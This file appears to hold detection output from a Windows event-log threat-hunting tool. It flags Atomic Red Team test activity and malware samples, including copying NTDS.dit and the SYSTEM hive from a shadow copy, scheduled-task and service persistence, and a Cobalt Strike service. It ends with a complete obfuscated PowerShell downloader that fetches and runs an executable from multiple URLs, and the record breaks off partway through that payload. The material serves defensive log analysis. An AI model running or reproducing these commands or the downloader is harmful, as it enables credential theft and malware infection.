+ SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653
+ 747F3D96-DA6E-5D31-0000-0010D8F63E00
+ 3316
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548270.45384,2019-07-19T18:57:50.453840+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4094
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:50.198
+ 747F3D96-DA6E-5D31-0000-0010D8F63E00
+ 3316
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1202] Indirect Command Execution,1563548270.398446,2019-07-19T18:57:50.398446+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a -c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4093
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:47.232
+ 747F3D96-DA6B-5D31-0000-00102DD33E00
+ 5348
+ C:\Windows\System32\pcalua.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Program Compatibility Assistant
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ pcalua.exe -a -c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653
+ 747F3D96-DA6B-5D31-0000-0010CCD03E00
+ 5332
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548267.238555,2019-07-19T18:57:47.238555+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4092
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:47.195
+ 747F3D96-DA6B-5D31-0000-0010CCD03E00
+ 5332
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548267.218345,2019-07-19T18:57:47.218345+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4091
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:46.915
+ 747F3D96-DA6A-5D31-0000-00104BC83E00
+ 888
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1563548266.92729,2019-07-19T18:57:46.927290+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4090
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Persistence - Scheduled Task Management
+ 2019-07-19 14:57:46.845
+ 747F3D96-DA6A-5D31-0000-0010C5C43E00
+ 3352
+ C:\Windows\System32\schtasks.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Task Scheduler Configuration Tool
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69
+ 747F3D96-DA6A-5D31-0000-001074C23E00
+ 3872
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548266.84987,2019-07-19T18:57:46.849870+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4089
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:46.814
+ 747F3D96-DA6A-5D31-0000-001074C23E00
+ 3872
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4135
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:50.383
+ 747F3D96-DDB6-5D31-0000-0010273D4C00
+ 3952
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-0020FF090500
+ 0x509ff
+ 1
+ Medium
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-D4A4-5D31-0000-0010DD6D0000
+ 804
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k DcomLaunch -p
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4135
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:50.383
+ 747F3D96-DDB6-5D31-0000-0010273D4C00
+ 3952
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-0020FF090500
+ 0x509ff
+ 1
+ Medium
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-D4A4-5D31-0000-0010DD6D0000
+ 804
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k DcomLaunch -p
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4135
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:50.383
+ 747F3D96-DDB6-5D31-0000-0010273D4C00
+ 3952
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-0020FF090500
+ 0x509ff
+ 1
+ Medium
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-D4A4-5D31-0000-0010DD6D0000
+ 804
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k DcomLaunch -p
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549087.258254,2019-07-19T19:11:27.258254+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4133
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:27.220
+ 747F3D96-DD9F-5D31-0000-001041504B00
+ 6508
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549087.233257,2019-07-19T19:11:27.233257+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4132
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:27.192
+ 747F3D96-DD9F-5D31-0000-00102D4D4B00
+ 976
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549087.202862,2019-07-19T19:11:27.202862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4131
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:27.156
+ 747F3D96-DD9F-5D31-0000-00101A4A4B00
+ 5772
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549087.169217,2019-07-19T19:11:27.169217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4130
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:27.069
+ 747F3D96-DD9F-5D31-0000-00107B454B00
+ 3344
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Service installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Audit,High,"Service installed in the system with Name ( WinPwnage ) , File Name ( %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe ) , Service Type ( user mode service ) , Service Start Type ( demand start ) , Service Account ( LocalSystem )",7045,"
+
+
+
+
+ 7045
+ 0
+ 4
+ 0
+ 0
+ 0x8080000000000000
+
+
+ 10446
+
+
+
+
+ System
+ IEWIN7
+
+
+
+
+ WinPwnage
+ %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe
+ user mode service
+ demand start
+ LocalSystem
+
+",IEWIN7,System
+cobalt strike service detected installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Threat,Critical,cobalt strike or meterpreter service detected installed in the system,7045,"
+
+
+
+
+ 7045
+ 0
+ 4
+ 0
+ 0
+ 0x8080000000000000
+
+
+ 10446
+
+
+
+
+ System
+ IEWIN7
+
+
+
+
+ WinPwnage
+ %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe
+ user mode service
+ demand start
+ LocalSystem
+
+",IEWIN7,System
+Service installed in the system,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,"Service installed in the system with Name ( remotesvc ) , File Name ( calc.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045,"
+
+
+
+
+ 7045
+ 0
+ 4
+ 0
+ 0
+ 0x8080000000000000
+
+
+ 6045
+
+
+
+
+ System
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ remotesvc
+ calc.exe
+ user mode service
+ auto start
+ LocalSystem
+
+",WIN-77LTAPHIQ1R.example.corp,System
+System Logs Cleared,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,System Logs Cleared,104,"
+
+
+
+
+ 104
+ 0
+ 4
+ 104
+ 0
+ 0x8000000000000000
+
+
+ 27736
+
+
+
+
+ System
+ PC01.example.corp
+
+
+
+
+
+ user01
+ EXAMPLE
+ System
+
+
+
+",PC01.example.corp,System
+Service installed in the system,1551605354.168476,2019-03-03T13:29:14.168476+04:00,,Audit,High,"Service installed in the system with Name ( spoolsv ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045,"
+
+
+
+
+ 7045
+ 0
+ 4
+ 0
+ 0
+ 0x8080000000000000
+
+
+ 4482
+
+
+
+
+ System
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ spoolsv
+ cmd.exe
+ user mode service
+ auto start
+ LocalSystem
+
+",WIN-77LTAPHIQ1R.example.corp,System
+Service installed in the system,1551605038.85688,2019-03-03T13:23:58.856880+04:00,,Audit,High,"Service installed in the system with Name ( spoolfool ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045,"
+
+
+
+
+ 7045
+ 0
+ 4
+ 0
+ 0
+ 0x8080000000000000
+
+
+ 4480
+
+
+
+
+ System
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ spoolfool
+ cmd.exe
+ user mode service
+ auto start
+ LocalSystem
+
+",WIN-77LTAPHIQ1R.example.corp,System
+Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.34971,2020-08-26T09:09:33.349710+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Get-Item): "Get-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"
+
+
+
+
+ 800
+ 0
+ 4
+ 8
+ 0
+ 0x80000000000000
+
+
+ 789
+
+
+
+
+ Windows PowerShell
+ DESKTOP-RIPCLIP
+
+
+
+
+ $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') 